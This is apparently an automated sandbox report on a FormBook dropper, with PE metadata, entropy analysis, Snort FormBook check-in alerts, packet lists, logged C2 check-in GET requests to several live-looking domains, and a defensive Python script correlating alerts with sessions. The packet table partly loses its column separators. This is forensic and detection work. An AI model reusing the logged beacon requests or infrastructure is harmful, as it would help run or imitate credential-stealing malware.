SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Note: this is the CLR assembly usage log that the .NET Framework 4.x runtime writes under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs when a managed process exits. The "Malicious" flag is inherited from the process that wrote it; the reputation line describes the file itself correctly. Its value is forensic rather than as a payload: it confirms that s6G3ZtvHZg.exe ran as a 32-bit .NET process and loaded Microsoft.VisualBasic, System.Windows.Forms, System.Drawing and System.Configuration, which is typical of a .NET stub that unpacks and injects the real payload.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.693808670494275
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: s6G3ZtvHZg.exe
File size: 893952
MD5: 885e567660a28ec23b692291587ef69f
SHA1: 9e200dd274b4be5df241719fe72f6403938a8561
SHA256: fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
SHA512: e7d965fab740e6fa1d15da2d2ffaf41927edbc5b0af13745f0e30f3b1d09ef2009720a22ab6100ba9db2dea85f9bcb8322575a9d9179521ca56daf15034c7cbc
SSDEEP: 24576:Z0QVbXphtO83Ns/nzuzW59j+12Fih2TjvLe:7zjM8SvzuzW59j+1IimvL
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.s`..............P..............=... ...@....@.. ....................................@................................

File Icon

Icon Hash: d28ab3b0e0ab96c4

Static PE Info

General

Entrypoint: 0x4b3d16
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60739D78 [Mon Apr 12 01:08:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Two caveats when reading this table. The compile time stamp (01:08:08 UTC) is about seven hours before the analysis, whose first network traffic is at 10:03 CEST (08:03 UTC): the dropper was built the same day it was detonated. The import hash f34d5f2d4577ed6d9ceec516c1f5a744 is the value shared by practically every .NET executable, because the only native import is mscoree!_CorExeMain (see Imports below); it cannot be used to pivot on this family.

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times in the report: the bytes following the stub are zero padding, and 00 00 disassembles to this instruction)

Only the first instruction is real code. It is the standard native stub of a .NET executable: 0x402000 is image base 0x400000 plus the 8-byte IAT at RVA 0x2000 listed in the data directories, whose single slot the loader fills with the address of mscoree!_CorExeMain. The 6-byte jmp sits at RVA 0xb3d16, exactly the last six bytes of .text (0x2000 + 0xb1d1c = 0xb3d1c), so nothing of interest is reachable from the entry point before the CLR starts executing managed code.

Data Directories

Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xb3cc4          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0xb4000          0x28024       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0xde000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xb1d1c       0xb1e00   False     0.953868916901   data       7.94799509268   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xb4000          0x28024       0x28200   False     0.347449376947   data       5.34674727144   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xde000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The .text section carries almost the entire file (0xb1e00 of 893952 bytes) at an entropy of 7.95 bits per byte and a ZLIB complexity of 0.95, i.e. it is effectively incompressible. Managed code and metadata never look like that; the section is dominated by an encrypted or compressed blob, which matches the behaviour flagged above (PE file injected into a foreign process, process hollowing). The whole-file entropy of 7.69 is lower only because .rsrc (icons, manifest) dilutes it.

Resources

Name           RVA       Size     Type                                                                                     Language  Country
RT_ICON        0xb4280   0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0xc4aa8   0x94a8   data
RT_ICON        0xcdf50   0x5488   data
RT_ICON        0xd33d8   0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON        0xd7600   0x25a8   data
RT_ICON        0xd9ba8   0x10a8   data
RT_ICON        0xdac50   0x988    data
RT_ICON        0xdb5d8   0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xdba40   0x76     data
RT_VERSION     0xdbab8   0x37e    data
RT_MANIFEST    0xdbe38   0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

The "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" types are libmagic guesses on raw icon bitmaps and mean nothing; the eight RT_ICON entries are an ordinary multi-size icon set (0x10828 bytes for the largest) that accounts for most of .rsrc and lowers the whole-file entropy.

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2012
Assembly Version  8.1.1.15
InternalName      SyncSortedList.exe
FileVersion       8.1.1.14
CompanyName       Landskip Yard Care
LegalTrademarks   A++
Comments
ProductName       LevelActivator
ProductVersion    8.1.1.14
FileDescription   LevelActivator
OriginalFilename  SyncSortedList.exe

The version resource is internally inconsistent (assembly version 8.1.1.15 against file and product version 8.1.1.14) and its company, product and original-filename strings have nothing to do with each other or with the submitted name. That pattern is characteristic of generated metadata; OriginalFilename and CompanyName are nevertheless usable hunting pivots for other builds of the same stub.

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
04/12/21-10:03:55.992832  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49719        80         192.168.2.7  104.21.7.67
04/12/21-10:03:55.992832  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49719        80         192.168.2.7  104.21.7.67
04/12/21-10:03:55.992832  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49719        80         192.168.2.7  104.21.7.67
04/12/21-10:04:06.577115  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.7  3.13.255.157
04/12/21-10:04:06.577115  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.7  3.13.255.157
04/12/21-10:04:06.577115  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.7  3.13.255.157
04/12/21-10:04:45.313567  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.7  52.58.78.16
04/12/21-10:04:45.313567  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.7  52.58.78.16
04/12/21-10:04:45.313567  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.7  52.58.78.16

All three Emerging Threats signatures fire on the same request (identical timestamp and 5-tuple), so each triple is a single HTTP GET, not three connections. The source port is the key that ties an alert to its session in the TCP packet list below; sessions without an alert are C2 candidates whose response did not match the check-in signatures, and still belong on the indicator list pending review.
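Joining the alert table with the packet list is the step an analyst does by hand when lifting indicators from such a report; the Python below is an added example for this page (not Joe Sandbox code) that does it mechanically. The inputs are transcribed from the two tables of this section with the fused columns separated; the packet excerpt deliberately stops before the third alert (10:04:45), so that alert shows up as one without a captured flow. Treating 192.168.2.7 as the client and keying sessions by (ephemeral port, server IP) is this example's assumption.

```python
import re
from datetime import datetime

# Transcribed from the Snort alert table above: timestamp, SID, src port, dst port, src IP, dst IP.
SNORT_ALERTS = """\
04/12/21-10:03:55.992832 2031453 49719 80 192.168.2.7 104.21.7.67
04/12/21-10:03:55.992832 2031449 49719 80 192.168.2.7 104.21.7.67
04/12/21-10:03:55.992832 2031412 49719 80 192.168.2.7 104.21.7.67
04/12/21-10:04:06.577115 2031453 49721 80 192.168.2.7 3.13.255.157
04/12/21-10:04:06.577115 2031449 49721 80 192.168.2.7 3.13.255.157
04/12/21-10:04:06.577115 2031412 49721 80 192.168.2.7 3.13.255.157
04/12/21-10:04:45.313567 2031453 49740 80 192.168.2.7 52.58.78.16
04/12/21-10:04:45.313567 2031449 49740 80 192.168.2.7 52.58.78.16
04/12/21-10:04:45.313567 2031412 49740 80 192.168.2.7 52.58.78.16
"""

# Excerpt of the TCP packet table: the first packet of each session plus a few replies.
TCP_PACKETS = """\
Apr 12, 2021 10:03:23.034774065 CEST 49705 80 192.168.2.7 192.0.78.25
Apr 12, 2021 10:03:23.075706959 CEST 80 49705 192.0.78.25 192.168.2.7
Apr 12, 2021 10:03:44.995295048 CEST 49711 80 192.168.2.7 15.165.26.252
Apr 12, 2021 10:03:50.707400084 CEST 49718 80 192.168.2.7 81.17.18.198
Apr 12, 2021 10:03:55.941447020 CEST 49719 80 192.168.2.7 104.21.7.67
Apr 12, 2021 10:03:55.992517948 CEST 80 49719 104.21.7.67 192.168.2.7
Apr 12, 2021 10:03:55.992831945 CEST 49719 80 192.168.2.7 104.21.7.67
Apr 12, 2021 10:04:01.148515940 CEST 49720 80 192.168.2.7 52.56.126.26
Apr 12, 2021 10:04:06.439419031 CEST 49721 80 192.168.2.7 3.13.255.157
Apr 12, 2021 10:04:06.576766968 CEST 80 49721 3.13.255.157 192.168.2.7
Apr 12, 2021 10:04:17.127279997 CEST 49734 80 192.168.2.7 52.206.71.220
"""


def parse_snort_ts(text: str) -> datetime:
    return datetime.strptime(text, "%m/%d/%y-%H:%M:%S.%f")


def parse_pcap_ts(text: str) -> datetime:
    # Nanoseconds are truncated to microseconds and the zone suffix dropped (both tables are local time).
    m = re.match(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d*\s+\w+$", text)
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def correlate(alert_text: str, packet_text: str, host: str = "192.168.2.7"):
    """Group packets into client sessions keyed by (ephemeral port, server IP), attach the SIDs
    that fired on each session, and order sessions by first packet so the cadence of the
    C2-candidate walk is visible. Returns (sessions, alerts_without_a_captured_flow)."""
    sessions = {}
    for line in packet_text.splitlines():
        ts, sport, dport, sip, dip = line.rsplit(" ", 4)
        key = (int(sport), dip) if sip == host else (int(dport), sip)
        s = sessions.setdefault(key, {"first": None, "packets": 0, "sids": set()})
        t = parse_pcap_ts(ts)
        s["first"] = t if s["first"] is None or t < s["first"] else s["first"]
        s["packets"] += 1
    orphans = []
    for line in alert_text.splitlines():
        ts, sid, sport, dport, sip, dip = line.split()
        key = (int(sport), dip) if sip == host else (int(dport), sip)
        if key in sessions:
            sessions[key]["sids"].add(int(sid))
        else:                                  # alert on a flow the packet excerpt does not contain
            orphans.append((parse_snort_ts(ts), dip, int(sid)))
    rows, prev = [], None
    for (port, ip), s in sorted(sessions.items(), key=lambda kv: kv[1]["first"]):
        gap = (s["first"] - prev).total_seconds() if prev else 0.0
        rows.append({"dst": ip, "client_port": port, "first": s["first"], "gap_s": round(gap, 1),
                     "packets": s["packets"], "sids": sorted(s["sids"])})
        prev = s["first"]
    return rows, sorted(orphans)


if __name__ == "__main__":
    rows, orphans = correlate(SNORT_ALERTS, TCP_PACKETS)
    for r in rows:
        print(r["first"].time(), "%+6.1fs" % r["gap_s"], r["dst"], r["packets"], r["sids"] or "-")
    for ts, ip, sid in orphans:
        print("alert without captured flow:", ts.time(), ip, sid)
```

On this input the ordered sessions show the sample contacting a new host every five to six seconds after the first two, with only 104.21.7.67 and 3.13.255.157 matching all three check-in signatures; 52.58.78.16 is reported separately because its flow is absent from the excerpt. Every destination in the list, alerted or not, is a candidate from the malware's configuration and should be recorded.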

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Apr 12, 2021 10:03:23.034774065 CEST  49705        80         192.168.2.7    192.0.78.25
Apr 12, 2021 10:03:23.075706959 CEST  80           49705      192.0.78.25    192.168.2.7
Apr 12, 2021 10:03:23.075937986 CEST  49705        80         192.168.2.7    192.0.78.25
Apr 12, 2021 10:03:23.076253891 CEST  49705        80         192.168.2.7    192.0.78.25
Apr 12, 2021 10:03:23.117088079 CEST  80           49705      192.0.78.25    192.168.2.7
Apr 12, 2021 10:03:23.117110968 CEST  80           49705      192.0.78.25    192.168.2.7
Apr 12, 2021 10:03:23.117119074 CEST  80           49705      192.0.78.25    192.168.2.7
Apr 12, 2021 10:03:23.117327929 CEST  49705        80         192.168.2.7    192.0.78.25
Apr 12, 2021 10:03:23.117460012 CEST  49705        80         192.168.2.7    192.0.78.25
Apr 12, 2021 10:03:23.158083916 CEST  80           49705      192.0.78.25    192.168.2.7
Apr 12, 2021 10:03:44.995295048 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.297630072 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.297919989 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.298271894 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.600028038 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601017952 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601061106 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601099968 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601140976 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601155996 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.601180077 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601210117 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.601217985 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601258039 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601300955 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.601301908 CEST  80           49711      15.165.26.252  192.168.2.7
Apr 12, 2021 10:03:45.601350069 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:45.601362944 CEST  49711        80         192.168.2.7    15.165.26.252
Apr 12, 2021 10:03:50.707400084 CEST  49718        80         192.168.2.7    81.17.18.198
Apr 12, 2021 10:03:50.757863998 CEST  80           49718      81.17.18.198   192.168.2.7
Apr 12, 2021 10:03:50.757976055 CEST  49718        80         192.168.2.7    81.17.18.198
Apr 12, 2021 10:03:50.758109093 CEST  49718        80         192.168.2.7    81.17.18.198
Apr 12, 2021 10:03:50.808378935 CEST  80           49718      81.17.18.198   192.168.2.7
Apr 12, 2021 10:03:50.822356939 CEST  80           49718      81.17.18.198   192.168.2.7
Apr 12, 2021 10:03:50.822392941 CEST  80           49718      81.17.18.198   192.168.2.7
Apr 12, 2021 10:03:50.822529078 CEST  49718        80         192.168.2.7    81.17.18.198
Apr 12, 2021 10:03:50.822621107 CEST  49718        80         192.168.2.7    81.17.18.198
Apr 12, 2021 10:03:50.873472929 CEST  80           49718      81.17.18.198   192.168.2.7
Apr 12, 2021 10:03:55.941447020 CEST  49719        80         192.168.2.7    104.21.7.67
Apr 12, 2021 10:03:55.992517948 CEST  80           49719      104.21.7.67    192.168.2.7
Apr 12, 2021 10:03:55.992671967 CEST  49719        80         192.168.2.7    104.21.7.67
Apr 12, 2021 10:03:55.992831945 CEST  49719        80         192.168.2.7    104.21.7.67
Apr 12, 2021 10:03:56.045136929 CEST  80           49719      104.21.7.67    192.168.2.7
Apr 12, 2021 10:03:56.058897972 CEST  80           49719      104.21.7.67    192.168.2.7
Apr 12, 2021 10:03:56.058953047 CEST  80           49719      104.21.7.67    192.168.2.7
Apr 12, 2021 10:03:56.059065104 CEST  49719        80         192.168.2.7    104.21.7.67
Apr 12, 2021 10:03:56.059170008 CEST  49719        80         192.168.2.7    104.21.7.67
Apr 12, 2021 10:03:56.110069990 CEST  80           49719      104.21.7.67    192.168.2.7
Apr 12, 2021 10:04:01.148515940 CEST  49720        80         192.168.2.7    52.56.126.26
Apr 12, 2021 10:04:01.200898886 CEST  80           49720      52.56.126.26   192.168.2.7
Apr 12, 2021 10:04:01.201147079 CEST  49720        80         192.168.2.7    52.56.126.26
Apr 12, 2021 10:04:01.201181889 CEST  49720        80         192.168.2.7    52.56.126.26
Apr 12, 2021 10:04:01.253643990 CEST  80           49720      52.56.126.26   192.168.2.7
Apr 12, 2021 10:04:01.253669024 CEST  80           49720      52.56.126.26   192.168.2.7
Apr 12, 2021 10:04:01.253680944 CEST  80           49720      52.56.126.26   192.168.2.7
Apr 12, 2021 10:04:01.253880978 CEST  49720        80         192.168.2.7    52.56.126.26
Apr 12, 2021 10:04:01.253906012 CEST  49720        80         192.168.2.7    52.56.126.26
Apr 12, 2021 10:04:01.306417942 CEST  80           49720      52.56.126.26   192.168.2.7
Apr 12, 2021 10:04:06.439419031 CEST  49721        80         192.168.2.7    3.13.255.157
Apr 12, 2021 10:04:06.576766968 CEST  80           49721      3.13.255.157   192.168.2.7
Apr 12, 2021 10:04:06.576963902 CEST  49721        80         192.168.2.7    3.13.255.157
Apr 12, 2021 10:04:06.577115059 CEST  49721        80         192.168.2.7    3.13.255.157
Apr 12, 2021 10:04:06.714370012 CEST  80           49721      3.13.255.157   192.168.2.7
Apr 12, 2021 10:04:06.714777946 CEST  80           49721      3.13.255.157   192.168.2.7
Apr 12, 2021 10:04:06.714795113 CEST  80           49721      3.13.255.157   192.168.2.7
Apr 12, 2021 10:04:06.714907885 CEST  49721        80         192.168.2.7    3.13.255.157
Apr 12, 2021 10:04:06.715009928 CEST  49721        80         192.168.2.7    3.13.255.157
Apr 12, 2021 10:04:06.852257967 CEST  80           49721      3.13.255.157   192.168.2.7
Apr 12, 2021 10:04:17.127279997 CEST  49734        80         192.168.2.7    52.206.71.220
Apr 12, 2021 10:04:17.253741980 CEST  80           49734      52.206.71.220  192.168.2.7
Apr 12, 2021 10:04:17.253856897 CEST  49734        80         192.168.2.7    52.206.71.220
Apr 12, 2021 10:04:17.254053116 CEST  49734        80         192.168.2.7    52.206.71.220
Apr 12, 2021 10:04:17.381551027 CEST  80           49734      52.206.71.220  192.168.2.7
Apr 12, 2021 10:04:17.381587029 CEST  80           49734      52.206.71.220  192.168.2.7
Apr 12, 2021 10:04:17.381611109 CEST  80           49734      52.206.71.220  192.168.2.7
Apr 12, 2021 10:04:17.381784916 CEST  49734        80         192.168.2.7    52.206.71.220
Apr 12, 2021 10:04:17.381843090 CEST  49734        80         192.168.2.7    52.206.71.220
Apr 12, 2021 10:04:17.508168936 CEST  80           49734      52.206.71.220  192.168.2.7
                                                                  Apr 12, 2021 10:04:22.617058992 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.809813976 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:22.809901953 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:22.810084105 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.060673952 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:23.319248915 CEST4973580192.168.2.7142.111.76.118
                                                                  Apr 12, 2021 10:04:23.560704947 CEST8049735142.111.76.118192.168.2.7
                                                                  Apr 12, 2021 10:04:28.448050022 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499239922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.499409914 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.499571085 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.550677061 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859160900 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859213114 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859246016 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859287024 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859333038 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859376907 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859422922 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859467983 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859505892 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859538078 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.859651089 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859695911 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859843016 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859869957 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.859878063 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:28.910902023 CEST8049736172.67.130.43192.168.2.7
                                                                  Apr 12, 2021 10:04:28.911047935 CEST4973680192.168.2.7172.67.130.43
                                                                  Apr 12, 2021 10:04:50.369215012 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.409693956 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.409964085 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.410053968 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.450339079 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450371027 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450383902 CEST8049741192.0.78.25192.168.2.7
                                                                  Apr 12, 2021 10:04:50.450684071 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.450711966 CEST4974180192.168.2.7192.0.78.25
                                                                  Apr 12, 2021 10:04:50.491023064 CEST8049741192.0.78.25192.168.2.7

                                                                  UDP Packets

                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                  DNS Queries

                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                                                  DNS Answers

                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

                                                                  HTTP Request Dependency Graph


                                                                  HTTP Packets

                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  0 | 192.168.2.7 | 49705 | 192.0.78.25 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Apr 12, 2021 10:03:23.076253891 CEST | 1368 | OUT | GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:23.117110968 CEST | 1372 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:03:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.7  49711        15.165.26.252   80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:03:45.298271894 CEST  kBytes transferred: 1447  Direction: OUT
Data:
GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1
Host: www.okitmall.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:03:45.601017952 CEST  kBytes transferred: 1448  Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:03:45 GMT
Server: Apache
X-Powered-By: PHP/5.6.36
X-Frame-Options: SAMEORIGIN
Cache-Control: No-Cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 1e04<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.7  49718        81.17.18.198    80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:03:50.758109093 CEST  kBytes transferred: 1488  Direction: OUT
Data:
GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1
Host: www.moretuantired.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:03:50.822356939 CEST  kBytes transferred: 1490  Direction: IN
Data:
HTTP/1.1 200 OK
